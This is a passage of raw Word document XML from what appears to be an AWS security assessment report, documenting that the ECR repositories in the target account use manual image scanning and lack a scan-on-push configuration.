      <w:r>
        <w:rPr/>
        <w:t>ECR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>settings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ECR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Repositories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="552" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="1544"/>
      </w:pPr>
      <w:hyperlink r:id="rId242">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/ecr/repositories?region=us-east-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Review the repositories and scan configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>repositories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>frequency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>scanned:</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45"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487627264">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>253799</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="102" name="Graphic 102"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="102" name="Graphic 102"/>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9.984228pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15689216;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape78" coordorigin="1440,400" coordsize="2880,0" path="m1440,400l4320,400e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>161</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId243">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/whitepapers/.../aws-security-incident-response...html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="750"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5445118" cy="1947386"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103" name="Image 103"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="103" name="Image 103"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5445118" cy="1947386"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="107"/>
        <w:ind w:left="943" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Repositories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>frequency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>scanned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>registry-wide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>configuration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="413"/>
      </w:pPr>
      <w:hyperlink r:id="rId245">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/ecr/private-registry/edit-scanning?region=us-</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId245">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>east-1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>registry-wide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>basic,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>filter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="897"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5232732" cy="3877151"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104" name="Image 104"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="104" name="Image 104"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId246" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5232732" cy="3877151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="113"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Registry-wide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
